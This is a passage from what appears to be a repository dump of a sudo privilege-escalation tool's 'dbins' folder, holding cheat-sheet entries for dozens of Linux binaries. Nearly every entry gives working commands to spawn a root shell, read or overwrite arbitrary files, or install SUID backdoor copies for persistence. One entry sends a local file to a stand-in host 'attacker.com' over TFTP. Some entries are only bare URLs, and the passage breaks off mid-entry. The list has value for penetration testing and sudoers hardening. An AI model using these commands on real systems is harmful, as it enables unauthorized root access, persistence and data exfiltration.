| maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ssh-keyscan -f $LFILE 7 | -------------------------------------------------------------------------------- /dbins/ssh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Spawn interactive root shell through ProxyCommand option. 6 | sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x 7 | -------------------------------------------------------------------------------- /dbins/sshpass.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sshpass /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/start-stop-daemon.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo start-stop-daemon -n $RANDOM -S -x /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/stdbuf.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo stdbuf -i0 /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/strace.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo strace -o /dev/null /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/strings.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo strings "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/su.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo su 6 | -------------------------------------------------------------------------------- /dbins/sudo.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sudo /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/sysctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * COMMAND='/bin/sh -c id>/tmp/id' 6 | sudo sysctl "kernel.core_pattern=|$COMMAND" 7 | sleep 9999 & 8 | kill -QUIT $! 9 | cat /tmp/id 10 | -------------------------------------------------------------------------------- /dbins/syst-resolve.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/syst-resolve.txt -------------------------------------------------------------------------------- /dbins/systemctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo /bin/sh >$TF 7 | chmod +x $TF 8 | sudo SYSTEMD_EDITOR=$TF systemctl edit system.slice 9 | * TF=$(mktemp).service 10 | echo '[Service] 11 | Type=oneshot 12 | ExecStart=/bin/sh -c "id > /tmp/output" 13 | [Install] 14 | WantedBy=multi-user.target' > $TF 15 | sudo systemctl link $TF 16 | sudo systemctl enable --now $TF 17 | * This invokes the default pager, which is likely to be less, other 18 | functions may apply. 19 | sudo systemctl 20 | !sh 21 | -------------------------------------------------------------------------------- /dbins/systemd-resolve.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo systemd-resolve --status 8 | !sh 9 | -------------------------------------------------------------------------------- /dbins/tac.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo tac -s 'RANDOM' "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/tail.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo tail -c1G "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/tar.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint- 6 | action=exec=/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which tar) . 17 | 18 | ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/ 19 | bin/sh 20 | -------------------------------------------------------------------------------- /dbins/task.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo task execute /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/taskset.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo taskset 1 /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/tasksh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tasksh 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which tasksh) . 17 | 18 | ./tasksh 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/tbl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo tbl $LFILE 7 | -------------------------------------------------------------------------------- /dbins/tclsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tclsh 6 | exec /bin/sh <@stdin >@stdout 2>@stderr 7 | -------------------------------------------------------------------------------- /dbins/tcpdump.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * COMMAND='id' 6 | TF=$(mktemp) 7 | echo "$COMMAND" > $TF 8 | chmod +x $TF 9 | sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root 10 | -------------------------------------------------------------------------------- /dbins/tdbtool.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tdbtool 6 | ! /bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which tdbtool) . 17 | 18 | ./tdbtool 19 | ! /bin/sh 20 | -------------------------------------------------------------------------------- /dbins/tee.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | echo DATA | sudo tee -a "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/terraform.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo terraform console 6 | file("file_to_read") 7 | -------------------------------------------------------------------------------- /dbins/tex.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tex --shell-escape '\write18{/bin/sh}\end' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which tex) . 16 | 17 | ./tex --shell-escape '\write18{/bin/sh}\end' 18 | -------------------------------------------------------------------------------- /dbins/tftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Send local file to a TFTP server. 6 | RHOST=attacker.com 7 | sudo tftp $RHOST 8 | put file_to_send 9 | -------------------------------------------------------------------------------- /dbins/tic.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo tic -C "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/time.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo /usr/bin/time /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/timedatectl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo timedatectl list-timezones 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/timeout.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo timeout --foreground 7d /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/tmate.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tmate -c /bin/sh 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which tmate) . 16 | 17 | ./tmate -c /bin/sh 18 | -------------------------------------------------------------------------------- /dbins/tmux.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo tmux 6 | -------------------------------------------------------------------------------- /dbins/top.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This requires that the root configuration file is writable and might be 6 | used to persist elevated privileges. 7 | echo -e 'pipe\tx\texec /bin/sh 1>&0 2>&0' >>/root/.config/procps/toprc 8 | sudo top 9 | # press return twice 10 | reset 11 | -------------------------------------------------------------------------------- /dbins/torify.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo torify /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/torsocks.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo torsocks /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/troff.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo troff $LFILE 7 | -------------------------------------------------------------------------------- /dbins/tshark.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/tshark.txt -------------------------------------------------------------------------------- /dbins/ul.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ul "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/unexpand.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo unexpand -t99999999 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/uniq.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo uniq "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/unshare.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo unshare /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/unsquashfs.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo unsquashfs shell 6 | ./squashfs-root/sh -p 7 | -------------------------------------------------------------------------------- /dbins/unzip.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo unzip -K shell.zip 6 | ./sh -p 7 | -------------------------------------------------------------------------------- /dbins/update-alternatives.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Write in $LFILE a symlink to $TF. 6 | LFILE=/path/to/file_to_write 7 | TF=$(mktemp) 8 | echo DATA >$TF 9 | sudo update-alternatives --force --install "$LFILE" x "$TF" 0 10 | -------------------------------------------------------------------------------- /dbins/update/newAdd/notes.md: -------------------------------------------------------------------------------- 1 | This folder should not be deleted! It will be used as a temporary location for new and downloaded dangerous bins. 2 | -------------------------------------------------------------------------------- /dbins/uudecode.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo uuencode "$LFILE" /dev/stdout | uudecode 7 | -------------------------------------------------------------------------------- /dbins/uuencode.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo uuencode "$LFILE" /dev/stdout | uudecode 7 | -------------------------------------------------------------------------------- /dbins/vagrant.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * cd $(mktemp -d) 6 | echo 'exec "/bin/sh"' > Vagrantfile 7 | vagrant up 8 | -------------------------------------------------------------------------------- /dbins/valgrind.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo valgrind /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/varnishncsa.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/vi.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo vi -c ':!/bin/sh' /dev/null 6 | -------------------------------------------------------------------------------- /dbins/viff.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/viff.txt -------------------------------------------------------------------------------- /dbins/vigr.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo vigr 6 | -------------------------------------------------------------------------------- /dbins/vipw.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo vipw 6 | -------------------------------------------------------------------------------- /dbins/virsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * SCRIPT=script_to_run 6 | TF=$(mktemp) 7 | cat > $TF << EOF 8 | 9 | x 10 | 11 | hvm 12 | 13 | 1 14 | 15 | 16 |